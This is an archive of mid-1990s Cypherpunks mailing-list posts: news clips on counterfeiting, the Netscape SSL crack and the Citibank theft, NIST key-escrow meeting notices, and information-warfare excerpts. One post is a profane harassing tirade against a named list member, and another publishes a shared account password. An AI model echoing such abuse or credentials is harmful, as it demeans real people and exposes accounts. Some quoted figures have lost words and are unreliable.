
@_date: 1994-12-29 17:27:27
@_author: Name withheld on request 
@_subject: No Subject 
Anybody know where there are compiled, ready to use versions of triple

@_date: 1995-08-04 11:15:43
@_author: Anonymous 
@_subject: PC E-cash (NewsClip) 
Secret Service Says Student Used PC To Print Money
Lubbock, Tex., Aug. 3 -- PC graphics programs have come a
long way since their inception, but not far enough to fool
the Secret Service. That's what a Texas Tech student tried
to do when he used his personal computer to print
counterfeit money, according to Secret Service agents. "He really put his whole heart and soul into it," according
to Lubbock, Texas Secret Service Resident Agent David
Freriks. Freriks said the man is an engineering student at Texas
Tech, but told agents he plans to change his major to
computer science. The 20-year old student hasn't been
identified by name since he hasn't been formally charged
yet, according to Freriks. But officials apparently aren't
concerned that he will flee. "At this point, he's more
afraid of his dad than anything," said one agent.
Freriks said the Pakistani national, who resides in
affluent southwest Lubbock, scanned a real $50 bill into
his PC, then printed the image to an Epson inkjet color
printer. Agents said the money looked real at a distance
but up close the designs were blurred, the coloration was
faulty, and the paper was slick and didn't have a watermark
Freriks said agents are confident that all of the
approximately $3,300 that was circulated has been recovered
except for about $1,000 which he said he is sure will show
up eventually, since the quality makes it easy for bank
employees to spot. ...
Investigators seized the home computer, printer and scanner
from the student's home. They said they also found a
suitcase containing almost $260,000 in fake $50 bills.

@_date: 1995-08-10 16:37:38
@_author: Anonymous 
@_subject: PERRY METZGER: YOUR MOMMY IS CALLING YOU HOME 
I'm tired of Perry. he's always ranting and stirring the shit.
he's always setting himself up as the savior of the list
signal. what the hell has he really written? oh, the poor
bastard has holed himself in his apartment to write crypto code or the world is going to die tomorrow. thank you, mr. Jesus Christ, Nailed to a Cybercross.
 WHY HATH WE FORSAKEN HIM??? oh, I can
see the blood oozing from the gaping flesh wounds. poor
Perry, having to bear this horrible cross while everyone
else stands around and gawks and remarks about Foster conspiracy theories... yes, we are being utterly inconsiderate
of his splendor and selflessness. has anyone seen
Mathew, Mark, John, or Luke around??? Perry has something
to say to them.
oh, and Perry has become Mr. Cyberlobbyist. yes, just
what we NEED, is another person to be sucked up and
ground up in the oozing washington slime regurgitator.
well, if it would swallow him up and never spit him
out, perhaps we should encourage him in his newfound
political passions.
I have seen an awful lot of noise on the
list, and I'm pretty f***ing amazed at how much of it
is due to PM and his BLACKBOARD FINGERNAIL SCREECHING.
he's worse than detweiler. actually, I think he may be a detweiler tentacle.  he's certainly doing a fantastic
impression of it.  mr. holier than thou Protector of the
Cypherpunks. perry, just go stay in your dark apartment and write your
code. we'll be happy to hear from you in a year when you
have all your little tinkertoy prototypes put together with
threads and bubblegum.  TCM is not the first person you have violated by posting
private mail. you are the lowest cypherscum for violating
privacy, perry. you know that if anything is sacred
to cypherpunks, it is Tim May and privacy, and frankly
I think you have been doing just a little to much pissing
on both of them lately. oh, violate Tim May's privacy?
well, stab two sacred cows with one bazooka, why don't
you, you little bastard... do we have any need for you?
maybe tim may is a weenie, but I'd rather have a weenie
around then YOU, and I think virtually EVERYONE HERE
concurs on that point... why don't you take a vacation from
the list? TCM has the guts to do this, and has done so
in the past. but you are just a bloated buffoon who
cannot tell when he is not wanted somewhere even as
people spit in your face.  hee, hee, reminds me of
someone else I know.
but frankly, perry, I don't think you have the balls to go away. if you are a real programmer, and all the real programmers
have left, what does that make you? stupid, I'd say. we would
not miss you one whit if you left, Perry. in fact I think
it's safe to say that we'd be quite delighted if you would
take your constant shit-stirring somewhere else and get
a life. TCM may have a pathetic excuse for a hobby,
but you have a pathetic excuse for a LIFE. I know you
personally Perry, and you couldn't conduct yourself in
a meeting of civilized people if you had your tongue chopped off, and I think there's plenty of meetings you've
been to when your peers were wishing exactly that....
xxxxxxooooo <- hugs and kisses, darling perry puppy

@_date: 1995-08-11 16:35:37
@_author: Anonymous 
@_subject: PRZ encrypted voice software release imminent 
Responding to msg by sbryan at maroon.tc.umn.edu (Steve Bryan) on Fri, 11 Aug  3:59 PM
PRZ is due to receive a prestigious design award for PGP this month, which may give a boost to public awareness of crypto's value for privacy.

@_date: 1995-08-16 22:14:16
@_author: Anonymous 
@_subject: SmartCash (NewsClip) 
Alliance formed to develop first nationwide smart card
New York, Aug. 16 (Reuters) - The United States is a step closer to cashless commerce.
Fourteen banks and financial instutions said Wednesday
that they will form a company to develop and issue the
first debit card that can be used nationwide instead of
cash for purchases under $20.
The new company, to be called SmartCash, will help speed
the implementation of so-called "smart card" technology
that uses a micro-processor chip embedded in the card to
store vast amounts of information, including improved
security features.
"The chip gives the card an amazing abitity to contain
stored information," said Nancy Elder, a spokeswoman for
MasterCard International Inc., one of the companies
participating in the creation of SmartCash.
In addition to Mastercard International, other founding
companies include Banc One Corp., Bank of America,
Chemical Bank Corp., CoreStates Financial Corp.,
NationsBank Corp. and Wachovia Corp. However,
participation in SmartCash will be open to all U.S.
financial institutions and card providers, the companies
"SmartCash represents a shared vision and a shared
commitment to deliver the increased convenience,
flexibility and efficiency of electronic cash to U.S.
consumers, merchants and banks," said Hatim Tyabji,
chairman of VeriFone Inc., a pioneer in stored value
technology and another founder of SmartCash.
The SmartCash card also will be standardised with similar
efforts already underway for smart cards developed by
credit card companies Europay, MasterCard and Visa.
"Standardized specifications are all woven into the
process. If you use your card in New York, it will be the
same as if you use it on the West Coast," Elder said.
The stored value application, one of the many uses of the
card's embedded chip, enables funds from the cardholder's
bank or credit-card account to be loaded into the card
from an automated teller machine or from one of the
terminals now under developement specifically for the
SmartCash card.
Elder said the companies have not identified what the
cost to the consumer would be, but noted, "the consumer
is going to have to see the value in it for them to want
to use it."
She also said there was a potential for the card to be
expanded for use by those without bank accounts, who
could credit the card in person at various locations.
Elder added that the demand for such a versatile card was
the driving force behind the broad alliance of companies
already signed on to the SmartCash plan.
"Sixty percent of consumers surveyed in the U.S. said
they would be willing to switch banks to get the use of
stored value (cards)," Elder said.
Amy Brinkley, executive vice president at NationsBank,
said the venture showed "unprecedented industry
cooperation to develop an innovative financial product."
SmartCash will combine assets and staff of the founding
companies and pursue technology being developed by
MasterCard, VeriFone, Electronic Payment Services Inc.,
and privately held Gemplus.
A pilot programme is already under development in
Delaware that will be overseen by Wilmington Trust and
Electronic Payment and other regional pilot programmes
were likely to spring up around the country next year,
Elder said.

@_date: 1995-08-18 15:06:41
@_author: Anonymous 
@_subject: WhiSSLing in the Dark 
Netscape Encrypted Data Cracked
Tokyo, Japan, Aug. 18 (NB) -- Two computer users have
managed to break Netscape's Secure Sockets Layer (SSL)
encryption code in response to a challenge posted to the
Internet. But far from scaring people away from using the
system for online purchases, the results could reassure
people of the safety.
In mid July Hal Finney, a US computer user, posted data
in an Internet message that he recorded when he sent an
order, containing a fake name and credit card details, to
Netscape's own computer. Setting a task for the hacking
community, he wrote, "The challenge is to break the
encryption and recover the name and address info I
entered in the form and sent securely to Netscape."
Early this week, news came from Damien Doligez, a French
computer user, that he had cracked the code and revealed
the contents of the message. Several hours later a
message from an American team also claimed the same feat,
actually cracking it two hours earlier than Doligez.
While the results look damaging on the surface, Netscape,
and Doligez, pointed out the amount of computer
processing power needed to hack just one message and the
difficulty in repeating the process.
Roseanne Siino of Netscape told Newsbytes, "The real
issue is whether this compromises security on the net. He
used 120 computers for 8 days just to crack one message."
Siino points out that to break into another message would
require another eight days at the same 120 workstations
and 2 parallel computers.
In home computer terms, Doligez guesses a network of
about 80 Intel Pentium-based machines would be equivalent
to the system he had access to via his workplace, INRIA
in Paris, and computers an Ecole Polytechnique and ENS.
Netscape estimates the total cost of this computing time
at around $10,000, meaning there are many more economical
ways of getting credit cards numbers than hacking into
Netscape SSL messages.
Doligez agrees, writing on his home page: "The technical
implications are almost zero. Everybody who understands
the technical details knew perfectly well that this was
do-able and even easy. You have to understand what
happened exactly. I did not break SSL itself. I did only
break one SSL session that used the weakest algorithm
available in SSL. If I want to break another session, it
will cost another 8 days of all my machines."
The vulnerability of the encryption system is shown by
its international use. The coding system available via
Netscape software from the Internet makes use of a 40-bit
encryption key. A stronger version, using a 128-bit key,
is available to US citizens but restricted from export
outside the United States by government regulations.
Netscape's Siino explained the US government allows
export of the lower security version "because they can
break it."
There are some hopes that this demonstration will help
persuade the US government to lift export restrictions on
some harder-to-crack versions of the code.
Netscape is currently developing a new Secure Courier
code which just encrypts the financial data in the
messages using 56-bit keys. Siino explained, "You can
export over 40-bit keys for a specific application." The
new system should be available early next year.
Many companies working on secure transaction systems hope
the much more secure 128-bit code version of the system
will be available for export eventually. This is said to
be almost unbreakable, requiring a trillion times more
processing power to crack than the 40-bit version.
Internet users can view a copy of the original challenge,
access Doligez's home page with details of his result,
get copies of the program used to crack the code and read
Netscape's response to the news through a special section
at Netscape,
Press contacts : Roseanne Siino, Netscape,
+1-415-528-2619 , Internet email roseanne at netscape.com;
Damien Doligez, Internet email damien.doligez at inria.fr ;
Hal Finney, Internet email hfinney at shell.portal.com)

@_date: 1995-08-18 18:40:09
@_author: Anonymous 
@_subject: Red Shift 
Citibank Theft
New York (AP) -- Russian computer hackers broke into a Citibank
electronic money transfer system and stole more than $10 before they were caught, according to newly-unsealed court
documents. The money was shifted from Citibank to accounts in
Finland, Russia, Germany, the Netherlands, the United States,
Israel and Switzerland, FBI agent Steven Garfinkel said. said six people have been arrested in the scheme and that none its clients lost money.

@_date: 1995-08-20 19:20:11
@_author: Anonymous 
@_subject: Basically F-C-ed 
FBI Probing Planted Explosive
Orlando, Fla., August 20 (AP) -- Two explosives were
planted in a professor's suitcase to test airport
security measures in Amsterdam, The Netherlands, and were
discovered when he arrived in Orlando, officials said
The professor, Paul Holloway of the University of
Florida, arrived at Orlando International Airport on
Friday afternoon and found his suitcase had been torn,
said Brian Kensel, a special agent with the FBI in Tampa.
He alerted Northwest Airlines security officials who
emptied his bag and found the two devices. No detonators
or fuses were with the materials, posing no danger to
passengers, Kensel said.
"We were satisfied that he was unaware of its presence
before it was found at the airport," he added.
Holloway had been attending a professional conference in
Finland and had traveled through Detroit, Michigan,
before arriving in Orlando, Kensel said.
He had stopped in Amsterdam on the way, and that was
where the device was placed, said Kathleen Bergen,
spokeswoman with the Federal Aviation Administration in
"It was part of a test," she said. "Basically the bag was
inadvertently loaded on board with the explosives still
Kensel said such security measures were normal for
"Particularly in Europe, there are grave concerns about
security issues," he said. "As a result, they do conduct
various security programs regularly. This was part of a
routine check of their own security systems.
"The bag got away from them basically," he said.

@_date: 1995-08-20 22:40:19
@_author: Anonymous 
@_subject: RealAudio website temporary passwordRe: RealAudio website temporary password 
The Cypherpunks RealAudio free account is now activated with password
"writecode" (case sensitive -- make them letters small).
The user name is still "cypherpu".  RealAudio.com does not truncate names
longer than 8 characters during login (meaning "cypherpunks" fails), but
their signup page won't allow entry of more than 8.  Silly.
Don't have too much fun listening to NPR, now...

@_date: 1995-08-20 23:00:15
@_author: Anonymous 
@_subject: RealAudio website temporary passwordRe: RealAudio website temporary password 
Oops.  Thank you for changing the password.  Shall we not use writecode
unless the site does not allow "cypherpunks" as the password?  I get it
Crypto relevance:
    The segment is overly optimistically billed as:
"Dan Charles reports the Clinton administration has reached a compromise
with the security
industry about the export of encryption equipment that will protect
personal computer files
and allow law enforcement agencies access to them if necessary. (3:30)"

@_date: 1995-08-23 07:46:57
@_author: Anonymous 
@_subject: Upcoming Key Escrow Meetings 
August 22, 1995
Attached for your information are notices of two upcoming
key escrow-related meetings.  The first, to be held on
September 6-7 at NIST will focus on two principal topics: 1) discussion of finalizing the criteria for the
exportability of software key escrow encryption with
64-bit key space; and 2) the desirable characteristics
for key escrow agents.  The second will be held on
September 15 at the Gaithersburg Hilton and will focus on
the development of Federal Information Processing
Standards for key escrow encryption, specifically to
include software implementations.
You are invited to attend one or both meetings and, if
you so choose, to speak at these meetings.  I hope to
have sufficient time for discussion, and therefore
encourage presentations to be clearly focused on the
topic at hand.
If you wish to attend, please notify me [sic] secretary, Arlene
Carlton on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton at micf.nist.gov.  Also, please let her know if you
would like to make a presentation with your
recommendations on either topic, or propose an additional
topic.  If you have any additional questions or
suggestions, please feel free to contact me on
Attachments (2)
             ----------------------------
                 Meeting Announcement:
                   Key Escrow Issues
The Commerce Department's National Institute of Standards
and Technology invites industry representatives and other
interested parties to a meeting on September 6 and 7, to
discuss issues related to key escrow encryption.  While
not limited, two principal agenda items for discussion
will be: 1) developing the criteria for software key
escrow encryption exportability and 2) the desirable
characteristics for U.S. key escrow agents.
Industry has asked the government for criteria for the
export of software key escrow encryption.  Rather than
simply publishing criteria, however, the Administration
desires consultations with industry in preparing final
criteria for publication.   This session of the meeting
will begin with a presentation of the government's
perspective of the desirable criteria, followed by a
chance for other participants to offer their thoughts on
this issue as well as reaction to the federal
perspective.  Under acceptable criteria, the government
is willing to allow for the export of strong cryptography
(e.g., DES) when coupled with a key escrow mechanism.  It
is anticipated that this would be coupled with a one-time
product review (e.g., as is the case for RC2/RC4
products) by the Department of State.  Following such
approval, the Department of Commerce would administer
export regulations.
The second session of the meeting will address the
desirable characteristics of acceptable U.S. escrow
agents.  Clearly, if export of key escrow encryption
products will be allowed, the cryptographic keys must be
stored with some entity.  This session will address the
criteria for the approval of such organizations.
It may also discuss what sort of legal protections, if
any, may be necessary to provide, for example, against
unauthorized release of encryption keys.  Follow-up
meetings to both issues may be necessary.
Other related topics may be included, time permitting. Note that a separate meeting has been scheduled for
9/15/95 to discuss the development of federal standards
for key escrow encryption.
Government representatives will attend from the Office of
Science and Technology Policy, the Department of State,
the Department of Justice, the Department of Commerce,
the National Security Agency, and the Federal Bureau of
If you would like to make a presentation with your
recommendations on either topic, or propose an additional
topic, please contact Ed Roback at NIST on 301-975-3696. Presentations may be limited in length to accommodate all
speakers.  The meeting will be open to the public,
although seating is limited. Advance registration is
requested, please contact Arlene Carlton on 301/975-3240,
fax: 301/948-1784 or e-mail: carlton at micf.nist.gov.  The
meeting will be held at the NIST in Gaithersburg,
              ---------------------------
                Workshop Announcement:
        Developing Federal Key Escrow Standards
On September 15, 1995, the Commerce Department's National
Institute of Standards and Technology will hold an
exploratory workshop on developing Federal Information
Processing Standards (FIPS) for key escrow encryption,
specifically to include software implementations.  This
effort is being initiated to further the Administration's
commitment to federal use of key escrow encryption.
Industry representatives and other interested parties are
invited to the workshop to provide their perspectives on
the desirable characteristics of key escrow encryption
standards to NIST and other federal officials. Government representatives also will present their
objectives and preliminary approach to this standards
development process.  Discussion will also include
proposals for follow-on activities.
For discussion purposes, one initial option for this
standards activity may be to create a generic key escrow
encryption standard containing criteria for federal use
of key escrow techniques implemented in either software
or hardware.  This high-level standard could then be
supplemented with lists of validated key escrow
techniques.  (Currently FIPS 185, "Escrowed Encryption
Standard," a hardware-based standard, is the only
FIPS-approved key escrow technique.)  Guidance would also
be needed to guide selection of appropriate key escrow
techniques for particular applications.  Key escrowing
will be used by federal agencies (and others, if they so
choose) in conjunction with FIPS-approved encryption
techniques.  Development and implementation of such
standards are necessary to guide federal agencies in
effectively and securely implementing key escrow
If you would like to make a presentation with your
recommendations for the development of federal key escrow
standards, please contact Ed Roback at NIST on
301-975-3696. Presentations may be limited in length to
accommodate all speakers.
The meeting is open to the public, although seating is
limited to approximately 100 individuals.  Advance
registration is requested; please call Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:
carlton at micf.nist.gov to register.  The meeting will be
held at Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.
8/17/95

@_date: 1995-12-01 16:19:57
@_author: Anonymous 
@_subject: A challenge ... 
This sounds like the "this is your last chance to send me $1!" ad:
      Announcing the 'Bank Account' Hack.       Rules: Wire me $100.       Reward: I'll give you a T-shirt.
      The *real* challenge will be getting your $100 back.

@_date: 1995-12-01 19:26:09
@_author: Anonymous 
@_subject: A "Warning Banner" for Netscape Navigator? Good idea!Re: A "Warning Banner" for Netscape Navigator? Good idea! 
A while back, someone on comp.infosystems. posted patches to CERN httpd
 allowing the proxy server to filter out url's based on regexp matching.
Thus you could update a regexp file as new ads appeared.
It should be fairly easy to implement something similar under Netscape 2.x
using plug-ins. Anyone interested in collaborating?
Wilhelm Busch

@_date: 1995-12-02 03:12:21
@_author: Anonymous 
@_subject: Media Advisory: GAK on Dec 5 
Reposted for background on the Netscape $5m IOUNSA for its insecure future:
Note that Messrs. Clark and Andreeson can't sell their stock until two years post IPO.
                        Meeting Announcement
     Draft 64-bit Software Key Escrow Encryption Export On December 5, 1995, the Commerce Department's National Institute of Standards and  Technology (NIST) will sponsor a meeting to discuss proposed exportability criteria (11/95  version) for 64-bit software key escrow encryption.  This meeting continues the industry-  government dialog of an earlier NIST-sponsored meeting held in September.  At that meeting,  officials of the U.S. Interagency Working Group on Encryption and Telecommunications  (IWG/ET) met with industry representatives and other interested parties to discuss an initial draft  of these criteria.  In response to comments received, the criteria have been revised with the intent  of achieving commercial acceptance within the flexibility permitted by law enforcement and  national security constraints.  Changes to the proposed criteria have been made, and a new draft is now available for public  review and comment. At the upcoming meeting, representatives from the IWG/ET will discuss the draft criteria and  answer related questions.  Time will follow for industry representatives and other interested parties  to comment on the criteria.  Also, breakout sessions will be held to discuss each criterion in  greater detail.  At a minimum, Government representatives are scheduled to attend from the Office of Science and Technology Policy, National Security Council, the U.S. Department of State, the  U.S. Department of Justice, the U.S. Department of Commerce, the National Security Agency,  and the Federal Bureau of The meeting will be held on Tuesday, December 5, 1995 from 9:00 a.m. to 5:00 p.m. at NIST in  Gaithersburg, Maryland in the Red Auditorium of the Administration Building.  Please register via  e-mail (to "elaine.frye at nist.gov") or via fax (301-948-1784) before November 30, 1995.  To  register, please provide: 1) your name, 2) organization, 3) postal address, 4) phone, 5) fax number  and 6) e-mail address.  Alternatively, walk-up registration will be available on-site the day of the  meeting. Directions from Washington, DC: from the Beltway (I-495) take I-270 North to Exit 10 (Clopper  Road).  At the first traffic light (Bureau Drive), turn left into the main entrance to NIST.  Follow  signs to the Administration Building parking lot.  The receptionist at the entrance to the  Administration Building can provide directions to the Red Auditorium.  If you would like to make a presentation with your comments on the proposed criteria, you are  asked to contact Elaine Frye at NIST via e-mail at "elaine.frye at nist.gov" or via telephone on 301-  975-2819 by November 30, 1995.  The number of presentations as well as their length may be  limited.  Presenters (and others wishing to distribute material) are asked to bring 250 (attendance  estimate) copies of their presentations to the meeting.
                        Background Paper
      Changes to the Criteria Based on Earlier Public Input
The government presented draft criteria (9/95 version) for the  export of software-based key escrow encryption at an open meeting  at NIST on September 6-7, 1995.  Meeting participants suggested  several changes to the criteria; the government re-drafted the  criteria as described below.  Industry's ideas and words were  included when possible and given serious consideration consistent  with the protection of fundamental interests (e.g., privacy and  national security).
General changes to the document: The document was re-structured  to make it clearer.  After the introductory text, related  criteria are grouped into the following categories:
          a.   key escrow feature
          b.   key length feature
          c.   interoperability feature
          d.   assurances
Changes to the introductory text: The wording has been clarified,  and additional words have been included to encourage vendors that  are considering building non-escrowed encryption products to  discuss their export objectives with the government.
Changes to the criteria: The criteria presented at the September  6-7 meeting have been modified in the following Old Criterion 1.    Moved to  wording clarified.
Old Criterion 2.    Moved to  wording clarified.
Old Criterion 3.    Split into  and  since the original
                    criterion had two major points in it (the
                    requirements for key escrow, and the
                    requirement on when the keys are first
                    escrowed); wording clarified.
Old Criterion 4.    Wording clarified; the notion of
                    accessibility to authorized entities was
                    modified to explicitly state that the
                    required information must be available with                     reasonable frequency.
Old Criterion 5.    Moved to  wording clarified, and the
                    example was deleted so that implementors                     not misled to believe that the example                     was the only way of satisfying that
                    requirement.
Old Criterion 6.    Moved to  wording clarified, and
                    applicability of this requirement was                     to address interoperability between a
                    product's key escrow mode and a non-key
                    escrow product.
Old Criterion 7.    Moved to  wording clarified.
Old Criterion 8.    Moved to  wording clarified because the
                    term "repeated involvement" was perceived                     being too broad.
Old Criterion 9.    Deleted.
Old Criterion 10.   Moved to  wording clarified, and
                    requirement modified to not preclude the
                    escrow of key by agents in addition to                     required by these criteria.
Note:   The September (and November) version of the criteria is
available electronically at:
*****************************************************  Elaine Frye
Computer Systems Laboratory, NIST
Bldg. 225/Rm.B154
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1784

@_date: 1995-12-02 09:10:26
@_author: Anonymous 
@_subject: Draft agenda for 12/5 Key Escrow Workshop 
Following for your information is the tentative agenda for the  meeting next Tuesday.
D R A F T
Proposed 64-bit Software Key Escrow
Encryption Export Criteria Meeting
Red Auditorium
National Institute of Standards and Technology
December 5, 1995
9:00        Welcome
              Ed Roback, NIST
9:10        Perspectives, Objectives of Criteria, and Future               Michael Nelson, Co-Chairman
              Interagency Working Group on
                     Encryption and Telecommunications (IWG/ET)
9:30        Exportability Criteria Discussion
              Clint Brooks
              National Security Agency
10:45         Break
11:00      Draft Key Escrow Agent Characteristics
              Geoff Greiveldinger
              U.S. Department of Justice
12:00      Lunch (on your own, NIST cafeteria available)
1:00       Industry Perspectives
              Bill Sweet & Ken Mendelson, TIS
              Dorothy Denning, Georgetown University
              Melanie Janin, U.S. Council for International                            Business
              Ed Scheidt, Tecsec
              Jerry Berman & Daniel Weitzner,
                     Center for Democracy and Technology
              Paul Lambert, Oracle
              David Sobol, Electronic Privacy Information               Padgett Petersen, Lockheed-Martin
              Robert Holleyman, Business Software Alliance
              Alex McIntosh, PC Security Limited (UK)
              Doug Miller, Software Publishers Association
              (time permitting:)
              Randy Sabett, Spyrus
              Shabir Safdar, Voters Telecommunications Watch
              Viktor Hampel, Hampel Consulting
2:30       Break
2:45       Cont. (as necessary)
3:45       Wrapup & Adjourn
              Ed Appel, Co-Chairman, IWG/ET
*****************************************************  Elaine Frye
Computer Security Division
National Institute of Standards and Technology  Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233
[Note that the planned breakout sessions originally appear
to have been axed, and the meet has dwindled to a vent for industry reps who've already publicized their positions. Now watch brute key escrow spread covertly for "public

@_date: 1995-12-02 15:23:33
@_author: Anonymous 
@_subject: unwanted AIP mail? 
Anyone else suddenly start hearing from these folks?

@_date: 1995-12-02 23:11:29
@_author: Anonymous 
@_subject: Gibson Warfare 
URL:    Forum, Number 28, May 1995   WHAT IS INFORMATION WARFARE?
   Martin C. Libicki, National Defense University
   Is Information War (IW) a nascent, perhaps embryonic art, or    the newest version of a time-honored feature of warfare? Is it a new
   form of conflict that owes its existence to the burgeoning    information infrastructure, or an old one whose origin lies in the
   wetware of the human brain but has been given new life by    information age? Is it a unified field or opportunistic    Since March 1993, Chairman of the Joint Chiefs of Staff Memorandum of
   Policy Number 30 (MOP 30) has set forth definitions and    that have guided the joint community in its thinking about the related
   concepts of information warfare and command and control warfare. As
   these seminal ideas have evolved, their definitions and    have changed as well. MOP 30 is under revision, and both higher level
   policy documents for the Department of Defense and doctrinal
   publications of the Joint Staff and Services are either in draft form
   or under revision.
   In light of the unformed state of these concepts,    definitions and taxonomies for twenty-first century warfare    proposed:
    1. command-and-control warfare [C2W];
    2. intelligence-based warfare [IBW];
    3. electronic warfare [EW];
    4. psychological operations [PSYOPS];
    5. hackerwar software-based attacks on information systems;
    6. information economic warfare [IEW] war via the control        information trade; and
    7. cyberwar [combat in the virtual realm]. ...
URL:    Of the seven forms of information warfare, cyberwarfare -- a    category that includes information terrorism, semantic    simula-warfare and Gibson-warfare -- is clearly the least    because by far the most fictitious, differing only in degree    information warfare as a whole. The global information    has yet to evolve to the point where any of these forms of combat is
   possible; such considerations are akin to discussions in the    era of what air-to-air combat would be. And the infrastructure may
   never evolve to enable such attacks. The dangers or, better,    pointlessness, of building the infrastructure described below may be
   visible well before the opportunity to build it will present itself. ...
   The difference between a semantic attack and hacker warfare is that
   the latter produces random, or even systematic, failures in    and they cease to operate. A system under semantic attack operates and
   will be perceived as operating correctly (otherwise the    attack is a failure), but it will generate answers at variance with
   reality.
   The possibility of a semantic attack presumes certain    of the information systems. Systems, for instance, may rely on sensor
   input to make decisions about the real world (e.g., nuclear    system that monitors seismic activity). If the sensors can be fooled,
   the systems can be tricked (e.g., shutting down in face of a
   nonexistent earthquake). Safeguards against failure might lie in, say,
   sensors redundant by type and distribution, aided by a wise
   distribution of decisionmaking power among humans and   GIBSON-WARFARE
   The author confesses to having read William Gibson's    Note 61 and, worse, to having seen the Disney movie "TRON." In both,
   heroes and villains are transformed into virtual characters    inhabit the innards of enormous systems and there duel with    equally virtual, if less virtuous. What these heroes and villains are
   doing inside those systems or, more to the point, why anyone    wish to construct a network that would permit them to wage    there in the first place is never really clear.
   Why bring up Gibson's novel and the Disney movie? Because to    what otherwise sober analysts choose to include as information warfare
   -- such as hacker warfare or esoteric versions of    warfare -- the range of what can be included in its definition is
   hardly limited by reality. ...
   Possible? Actually, yes. Relevant to national security? Not

@_date: 1995-12-02 23:25:28
@_author: Anonymous 
@_subject: Info Foes 
URL:    Strategic Forum
                      THE REVOLUTION IN MILITARY AFFAIRS
   Martin Libicki, CDR James Hazlett, et al.
  DISCUSSION I: STRATEGIC CHALLENGES
   Those who assess future strategic challenges tend to look to    countries, and to categorize competitors as peer, regional, or niche.
    Asia and the Nation-State
    Most conference participants believe that, over the next    years, the fulcrum of world politics will continue to shift    Europe and its peripheries to the Asia-Pacific region. The period of
   European dominance produced innumerable wars as various    challenged each other for power, resources, and sovereignty. With the
   formation of the European Union and the dissolution of the    Pact, great power rivalry in particular and the nation-state    general are fading somewhat in importance.
   The nation-state remains strong in Asia, however. The last fifty years
   have seen considerable economic progress as various nations have made
   themselves richer by grasping the secrets of rapid    This trend, which started in Japan in the 1950s and 1960s, spread to
   the Tigers in the 1970s, ASEAN countries in the 1980s, and China and
   perhaps India in the 1990s, has left no Asian country    Economic growth, however, has not made the nation-state obsolete. To
   the contrary, the nation-state has been instrumental in creating the
   internal and external conditions for economic growth. European history
   suggests that countries, once they taste wealth, will struggle for
   power. Will Asian countries follow that pattern or demonstrate new
   models of what the nation-state is capable of? ...
    Types of Competitors
   One taxonomy of future threats suggested at the conference is to
   classify potential competitors as peer, regional, or niche. A peer
   competitor could challenge our military across the board. A    competitor would be incapable of doing so, but would strive to inhibit
   or defeat U.S. intervention by developing capabilities such    primitive weapons of mass destruction, sensor blinders,    terrorism, information system attacks, psychological operations, or
   hostage maneuvers. ...
  DISCUSSION II: OPERATIONAL CHALLENGES
   Considerable evidence suggests that commercial access to    -- GPS readings, space-based imagery, and Internet data -- could be
   transformed into military advantage thereby levelling the    field between ourselves and our potential opponents. Other    technologies, for instance, those that would permit remote piloting of
   aerial vehicles, permit commercial technologies such as    video photography to act as powerful military tools accessible to all
   (RPVs are made in more than thirty countries).
    Technologies That Level the Field
   Does the proliferation in information technologies necessarily negate
   our current military lead? Information-based warfare creates    vulnerabilities for industrial-age institutions slow to adapt. Because
   most U.S. logistics facilities and command nodes are not well hidden,
   they are vulnerable to precision strike. The widespread    of overhead imagery coupled with GPS integration into weapon    no more than a few years away for countries such as India--poses a
   serious threat to which our improving defensive measures    anti-tactical ballistic missiles) will provide only a partial solution
   . Our own counter-C2 operations are complicated by the rapidly falling
   cost of bandwidth and redundancy. Even if 90 percent of a bit flow can
   be interdicted, the remaining 10 percent may suffice for    uses. Rapid expansion of cellular nodes, particularly    exploitation of commercial space assets, may make targeting    communications denial difficult or impossible. Multiple channels of
   electronic access will also complicate psychological operations and
   countermeasures.
    With the advent of the global information infrastructure, a    adversary could take advantage of open information systems to enhance
   its own communications, information, navigation, intelligence, and
   operational support: examples include GPS, one-meter imagery, weather
   data, and even CNN. Every year more information with    military use can be gleaned by anyone from the Internet    leaving fingerprints. How easily can a country's access to the global
   satellite communications networks be blocked? The coming    information infrastructure will have many points of entry. It will
   also be difficult to curtail certain services (e.g., global
   navigation) without denying them to U.S. users or even our    national security establishment.
    Technologies that Keep Us Ahead
   The United States, nevertheless, retains an edge in two    areas: space and systems integration. Space systems are    difficult to build and although many potential middle-income
   adversaries can borrow space services from third parties, fewer can
   own satellites, and far fewer can launch them. Thus the United States
   will retain a clear edge in the size and sophistication    and interpretation) of space capabilities, in their adoption    adaptation for military uses, in their augmentation or adaptation for
   the particulars of future contingencies, and in the assurance of their
   continuity.
   The distinctions between data and information, and between    and knowing could also favor U.S. forces. There are vast    between, for instance, access to meteorological imagery and
   determining, for instance, that a locus of operations is likely to be
   fogged in 24 hours hence (a distinction relevant to the    campaign). The art of operational planning is not acquired
   automatically with the acquisition of computers. Similarly, as sensors
   proliferate in type as well as numbers, data fusion is likely to
   become more decisive in future conflicts. ...
POLICY RECOMMENDATIONS
    Two conference threads merit further examination:
     * U.S. defense policies that make it more difficult for        competitors to threaten their neighbors and hold off the        States at the same time may be worth pursuing for that fact alone.
     * If militarily relevant information technologies are        sophistication at using them may be a better predictor of how
       challenging a competitor may become for the United        Therefore, in addition to worrying about how large future foes are
       (and sizing our own forces accordingly), we should also focus on
       the potential sophistication of our foes (and develop        accordingly).

@_date: 1995-12-03 00:41:30
@_author: Anonymous 
@_subject: Four Info Threats 
URL:    Forum, Number 35, July 1995
                               THE NEXT ENEMY
   Martin C. Libicki, National Defense University
   The Cold War offered military planners considerable strategic clarity
   the threat was known, and the problem was generating a force    of sufficient size and sophistication to counter it. Today's    threats are varied and, for the most part, well below the level that
   even a shrinking U.S. force can handle comfortably. Threats ten to
   twenty years out, however, must be taken seriously because of the long
   time required to complete a major systems acquisition; to    test, and institutionalize new doctrine; and to accomplish    organizational innovations necessary to use both    Future threats may be divided into four categories: peers,    terrorism, and chaos. ...
   Peers
   Few planners think it likely that the next twenty years will see a
   reemergence of a nation that can pose a challenge to U.S.    power as broadly as the Soviet Union did. However, at least    countries (Russia and China) could conceivably be peer adversaries at
   the strategic level of nuclear weapons, space, and    systems.  ...
   Another avenue of future competition may be information warfare. Can
   or should the United States hold other nations' participation in the
   world economy at risk? The United States might be able to shut down
